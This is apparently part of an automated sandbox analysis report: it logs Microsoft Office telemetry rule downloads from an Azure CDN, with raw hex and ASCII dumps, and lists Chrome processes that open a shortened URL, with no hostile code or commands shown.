                                                        2024-11-12 15:27:22 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.64987013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:22 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:22 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:22 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1399
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                        ETag: "0x8DC582BE1CC18CD"
                                                        x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152722Z-16547b76f7f22sh5hC1DFWyb4w0000000fs000000000b27c
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:22 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.64987113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:22 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:22 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:22 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1362
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                        ETag: "0x8DC582BEB256F43"
                                                        x-ms-request-id: 7cdf3305-b01e-0070-0ea7-341cc0000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152722Z-17df447cdb5qkskwhC1DFWeeg40000000cng0000000095c4
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:22 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.64987213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:22 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:22 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:22 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1403
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                        ETag: "0x8DC582BEB866CDB"
                                                        x-ms-request-id: 1deecc73-401e-0029-32d2-2c9b43000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152722Z-16547b76f7f4k79zhC1DFWu9y00000000fu000000000fsxr
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.64987313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:22 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:23 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:22 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1366
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                        ETag: "0x8DC582BE5B7B174"
                                                        x-ms-request-id: 14de8335-b01e-003e-77d2-2c8e41000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152722Z-16547b76f7f22sh5hC1DFWyb4w0000000fq000000000g77k
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:23 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.64987413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:23 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:23 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:23 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1399
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                        ETag: "0x8DC582BE976026E"
                                                        x-ms-request-id: 61349519-801e-008f-3bad-342c5d000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152723Z-17df447cdb5xwzjjhC1DFWz7vs000000015000000000hmv6
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:23 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.64987513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:23 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:23 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:23 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1362
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                        ETag: "0x8DC582BDC13EFEF"
                                                        x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152723Z-16547b76f7f2g4rlhC1DFWnx880000000fpg00000000h197
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:23 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.64987713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:23 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:23 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:23 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1388
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                        ETag: "0x8DC582BDBD9126E"
                                                        x-ms-request-id: 2d6c3f80-401e-0067-1fa0-3409c2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152723Z-17df447cdb5bz95mhC1DFWnk7w0000000c60000000001xe3
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:23 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.64987813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:23 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:23 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:23 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1415
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                        ETag: "0x8DC582BE7C66E85"
                                                        x-ms-request-id: 3018e20c-101e-008d-17d2-2c92e5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152723Z-16547b76f7fkcrm9hC1DFWxdag0000000g10000000001e0c
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:23 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:10:26:47
                                                        Start date:12/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff684c40000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:10:26:51
                                                        Start date:12/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2052,i,14813094074098594587,18073620675259000167,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff684c40000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:3
                                                        Start time:10:26:54
                                                        Start date:12/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/Bv1rG"
                                                        Imagebase:0x7ff684c40000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        No disassembly